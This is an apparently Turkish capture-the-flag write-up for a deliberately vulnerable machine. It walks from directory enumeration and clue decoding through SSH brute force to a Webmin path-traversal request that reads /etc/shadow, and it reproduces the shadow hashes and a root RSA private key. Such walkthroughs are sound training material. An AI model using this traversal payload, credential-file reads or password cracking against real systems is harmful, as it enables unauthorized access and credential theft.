http://D0Not5topMe.ctf/manual/zh-cn/programs/ ---- + http://D0Not5topMe.ctf/manual/zh-cn/programs/index.html (CODE:200|SIZE:6833) ---- Entering directory: http://D0Not5topMe.ctf/manual/zh-cn/ssl/ ---- + http://D0Not5topMe.ctf/manual/zh-cn/ssl/index.html (CODE:200|SIZE:5042) ----------------- END_TIME: Fri May 12 13:27:48 2017 DOWNLOADED: 433528 - FOUND: 96
Arkaplanda devam ederken kayıt olmaya çalıştım ve başlık bilgilerinde dikkatimi çeken kısım oldu.
http://d0not5topme.ctf/FLaR6yF1nD3rZ_html adresine baktığımızda;
+++++ +++[- >++++ ++++< ]>+++ +++.+ +++++ .<+++ +[->- ---<] >---- ----. ++.<+ +++++ [->++ ++++< ]>+++ ++.<+ +++++ [->-- ----< ]>--- ----. +++++ +.<++ +++++ [->++ +++++ <]>++ +.<++ +++++ [->-- ----- <]>-- ----- ----- -.++. <++++ ++[-> +++++ +<]>+ +++++ +++++ +.<++ ++[-> ++++< ]>+++ +.<++ +++++ +[->- ----- --<]> ----- .<+++ +++++ [->++ +++++ +<]>+ .++++ ++.<+ +++++ ++[-> ----- ---<] >---. <++++ +++[- >++++ +++<] >++++ +++++ ++++. <+++[ ->--- <]>-- ---.< +++++ ++[-> ----- --<]> .+.+. ----- -.+++ +++++ +.-.- ---.< +++++ ++[-> +++++ ++<]> ..-.- .++++ +.++. +++++ ++++. <++++ +++[- >---- ---<] >---- ----- --.-- ---.< +++++ ++[-> +++++ ++<]> +++++ .<+++ [->++ +<]>+ +.++. --.++ .<+++ ++++[ ->--- ----< ]>--- ----- ---.<
Benim de bildim olmadığı için metni gruba sordum, öğrendim ki Brainfuck 🙂 Gökay kardeşime teşekkür ederim. Ayrıca Çağatay’ın da reklamını yapalım.
https://github.com/cagataycali/awesome-brainfuck
Kodu çalıştırdğımızda flag karşımızda FL46_4:n02bv1rx5se4560984eedchjs72hsusu9 . Yalnız burda üçüncü bayrağı atladığımı farkediyorum. Sil baştan başladım ve smtp portunu gözden kaçırdığımı gördüm (Saatlerimi aldı).
nc -vv 172.189.64.225 25 komutu ile gelen dataya eriştim.
Hex olan datayı çözdüğümüzde aşağıdaki gibi sonuç çıktı.
46 4c 34 36 5f 33 3a 32 39 64 72 79 66 36 37 75 68 65 68 74 32 72 31 64 64 34 71 70 70 75 65 79 34 37 34 73 76 78 79 61 0a FL46_3:29dryf67uheht2r1dd4qppuey474svxya
Sitede hata verdirtmeye çalışırken mail adresini gördüm ve yeni sitemizi bulmuş olduk.
Sitenin kaynağını incelerken game.js içinde yen bir adres buldum ve ordan devam ettim.
Gelen oyunda yine oyunu oynamak yerine kaynak koda baktım ve yeni adresi aldık.
Yeni siteyi /etc/hosts dosyasına ekledikten sonra terminalde kodları çalıştırmaya deniyorum. Parola t3rm1n4l.ctf onu bulduktan sonra
yeni adresi M36u574.ctf olarak buluyorum. Sitede resimler dışında veri bulamadım. Exif ve stenografi incelemesi yaparken “kingmegusta.jpg” resminin açıklamasında base64 veri gördüm.
TWVHdXN0YUtpbmc6JDYkZTEuMk5jVW8kOTZTZmtwVUhHMjVMRlpmQTVBYkpWWmp0RDRmczZmR2V0RGRlU0E5SFJwYmtEdzZ5NW5hdXdNd1JOUHhRbnlkc0x6UUd2WU9VODRCMm5ZL080MHBaMzAK MeGustaKing:$6$e1.2NcUo$96SfkpUHG25LFZfA5AbJVZjtD4fs6fGetDdeSA9HRpbkDw6y5nauwMwRNPxQnydsLzQGvYOU84B2nY/O40pZ30 MeGustaKing:**********
Parolayı da hashcat ile çözdükten sonra ssh bağlantısı deniyorum. (Ki trollendik 🙂 )
U2FsdGVkX1/vv715OGrvv73vv73vv71Sa3cwTmw4Mk9uQnhjR1F5YW1adU5ISjFjVEZ2WW5sMk0zUm9kemcwT0hSbE5qZDBaV3BsZVNBS++/ve+/ve+/vWnvv704OCQmCg== Salted__�y8j���Rkw0Nl82OnBxcGQyamZuNHJ1cTFvYnl2M3Rodzg0OHRlNjd0ZWpleSAK���i�88$& FL46_6:pqpd2jfn4ruq1obyv3thw848te67tejey
Aldığımız bilgilerle ssh bağlantısı için bruto force gerçekleştirdim.
Bundan sonrası en zorlandığım kısım oldu. Id, cat vs. komutlar çalışmadığı için ya echo “$(</etc/passwd)” şeklinde kullanabildim ya da ssh özelliğinden sonuna cat /etc/passwd ekleyerek.
Burdan sonra takıldım ve Linux enumeration scriptlerini denemeye başladım.
Çalıştırılabilir script olarak /usr/bin/wmstrt vardı. Çalıştırdığımda 20’den geriye sayarak “D1dyaCatchaT3nK1l0? ” verdiğim ingilizce tepkiyi burda yazmak isterdim 🙂
Biraz düşününce 10000 portunun aktif olduğunu gördüm. 20 saniye sonra servis durduğu için ufak bir araştırmayla for i in {1..1000..1};do echo $(/usr/bin/wmstrt); bu şekilde döngüye soktum.
Çalışan servisi açtığımda https bağlantısına işaret etti.
Ssl ile bağlantı yaptığımda WebAdmin çalıştığını gördüm ve zafiyetini bulmak zor olmadı 🙂
https://172.189.64.225:10000/unauthenticated/..%01/..%01/..%01/..%01/etc/shadow
root:$6$6BxJZ5xd$x84bX7slaDzCWbtdQxNjVC92B7YrXlBsUCYVpsoI.MFqcT1tnoTMgXTK6O8Pkm1I7pS/7FvgagDWdkpliygQw1:17260:0:99999:7::: daemon:*:17253:0:99999:7::: bin:*:17253:0:99999:7::: sys:*:17253:0:99999:7::: sync:*:17253:0:99999:7::: games:*:17253:0:99999:7::: man:*:17253:0:99999:7::: lp:*:17253:0:99999:7::: mail:*:17253:0:99999:7::: news:*:17253:0:99999:7::: uucp:*:17253:0:99999:7::: proxy:*:17253:0:99999:7::: www-data:*:17253:0:99999:7::: backup:*:17253:0:99999:7::: list:*:17253:0:99999:7::: irc:*:17253:0:99999:7::: gnats:*:17253:0:99999:7::: nobody:*:17253:0:99999:7::: systemd-timesync:*:17253:0:99999:7::: systemd-network:*:17253:0:99999:7::: systemd-resolve:*:17253:0:99999:7::: systemd-bus-proxy:*:17253:0:99999:7::: Debian-exim:!:17253:0:99999:7::: messagebus:*:17253:0:99999:7::: statd:*:17253:0:99999:7::: avahi-autoipd:*:17253:0:99999:7::: sshd:*:17253:0:99999:7::: burtieo:$6$BBlsb/oG$Aw.HS4JQQ7RgwB.5puvo7yJvXpa5URKfHxUcFYJM42b0pTIkH8Dao3QYrSLADS7Ov4fstuOHHYF8K/Khvpbc//:17257:0:99999:7::: pdns:!:17253:0:99999:7::: mysql:!:17253:0:99999:7::: MeGustaKing:$6$.owswwq.$CMShrXnYmTvT2naqaqCDfUyEYJp0B8MoaW5q4YqU1uOBFlE6xtOby1S7EVvmdqWO5Oe/a5lBog7LovMJC4e/9/:17259:0:99999:7::: dnsmasq:*:17257:0:99999:7:::
Bu kadar aşamadan sonra eriştiğim o root parolası kırılmasa makinayı çözmeyi bırakacaktım. Root parolasını bulmaya çalışırken aklıma başka bir makinadaki yol geldi.
Public ve private key’i elde edip ( /root/.ssh/id_rsa ) bağlanmak.
/root/.ssh/id_rsa... -----BEGIN RSA PRIVATE KEY----- Proc-Type: 4,ENCRYPTED DEK-Info: AES-128-CBC,7DA162212961C0CF94C636B47C991024 rDnUjh68EoasdaP40ta9QBeXtvB5uUVH9nKHKWo4KvhLcM4Z0/R6qvjSjlHir4LR uhTb5Y+e2C7Wze8GlYbdGksFXbUztZec26vN7xH8Q4SeI++J77agqKWRE6jJ++hd DsR7vDcqGbm9xX37BbE9Q4lLEHR/hNRe3/Ztrbt3obnCLvCW6H3kzpteycWAQQ3W BaFns85p4AZn654HoIqX/UOkztdYxgOLgpzrLh9p1bRLiaOiBCrURkpYLspeKCNN yfuPvNUgF1+uH78GlvLwfAA6XRj6HPDZ3D22/MxKcGixUVSPXjJlRpqyFQtvSM6T cN5NmXjOjmzfgafqPqf7eTFfLChcsWHUmsSneq7pQhvw/vfeGX2kizuXCago+yWt 2IlFusQilfDDzybiunNOp+njD7TxeBLFcAUVdACfMUQ/fC0GHKeHB8q79Wi7r0SQ m0eC6fIXJpDavN9PtPF2v+5OH9EDKycaeWMmWT0S0fNMmIhHb+U/uhtDjQx+M9fI I5aBCjzCsDCoKT0qkv+dTafyqSzUN9EupCRh0NcsUT00yrQkxzM5L6C3H+61SNq8 CNi4I50aDp8q6m0KP/GZhUAU9Uegj+JZQ1h5MSnjOpOvKbD4l6/rWM02iFVAmg4O WjSQfqbxGCmoHE8Y7iqgB8lRWnDYPssDXIMx+1pBkNkBASMpz6gJBZ//rJE1PkVr aKdhbJFR1NX097z3HXS/7SBJmyuctG+JviH7mp1fH3WMAk2iu4nSiE1aNH1YV/nW rXNOi5c7/yDE9o/weuJoCBL4VXeH89+l8551JOGU9RMuNk0pi/SSaUwwn7wR0/Yf b9Sk3pbFDS64AON1T+4zlBWWif8aRMJ7Vm6zkDsE1Jq9nKcNzDknfufs45mKVzXU m9dlGgzfNF46yPCuHzBZt4q1wrzg5/7gcWx5Qq6xD5VtWiMlB4G3D8DruaeqgTOi Sh/jFqEOErA015Ympz/0Hh/lFn0NAAJy89BPG86d+VVAn5YstQEqH6zzuIy9mZ9K 853+0BUxA0I9rEessa+Q+NlFadBVE2FcJAr7rMsLGZFoqfvWxg5hBJFJ7jrjpQNe Q9qzA/CbiMeU+zdifXZwprJR1fNVWalPJJGwotwVgXN/z4s8iN1gMN9y4Kynue9k zQ/HqvgTkyX52ojLnM/PkXCyx7EXBAOJi5s6fv/22kcZ5Xkpw+x/VILPnJqObmU9 RZ3IB6kbckiMld5GX+xMvYi9rvmHf/mdLj75e7PU+FjCufApXAi+T10PnvMvrCGS FkSlVyPPo1s4klTdrf2l6tkK6Lqu/7SamkvQvMsY7wnNT4OPI95y3GoRnwEFLd7w honOroF1U6leA5O8jxSxI/CIwxvb5DO/sX4bZxShlhD98yO74ImAg5ACTj/eUaVA /Q7bpfasSnqdKNWhx81pD6Ee9WeBZv8c0I0/EqS188O1qFYbtsaqZhYytTqYwvZ0 p6QuusMnDaA1nB8wL7ltKXt5PhBBxSVbUKtP6DWcBRviItFTsAnmK1QhD2wmTkCu B8ochgwCgtAUs4cUXxnZrp5pu2yvu8Dhf//z8lBtoItPh5LTmW1N1g4s+9NKt72P -----END RSA PRIVATE KEY-----
/root/.ssh/id_rsa.pub ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDPKVt8KEVrr80LT9ZwRsWG8w9O2vgWd99+2+xmi3WCgCR/IrhqoJqEhX9owwiaUUnyRWrj9AKDj8Neetju9rOCTJsvWAlfFgyrRXkOV9twpLcrML+LC5GsVGLH7U/R2sTpT9Ywad0yL+FTvHZ+AbYLFpml4Gbhat6Ynhcg3Q6XmxGHXkV9cd6/XCx74K8CKEtOye1REj8KDtsC329qvbp/9Dt1ZZQEAUFvLqgLJiZxmH5snWiszcO2TKQ3lUw3tLy5rA/bXe3Bf4zuEmktEuA0NW+FTLYELrBy/5PK007Uh0CQVpVS5C+tkLtqh6meAXPp7dhi/B6qGOIXpPxjpUjH [email protected]
Kırdığım parolayı da kullanarak bağlantıyı sağlıyorum. ssh -i id_rsa [email protected] .
Sonuç:
Root dizininden de son flag çıkmış oldu.
###################################################### # # # W311 D0n3 # # Y0u D1d N0t5top # # Much0 M3Gu5t4 :D # # # # 3mrgnc3 # # # # Hope you had fun... # # 8ut... # # # # p.s.. # # 571ll 1 M0r3 f146 :D # # # ###################################################### FL46_7:9tjt86evvcywuuf774hr88eui3nus8dlk N3v3r As5um3! 1t M4k35 4n 455 0f y0u & m3 :DWS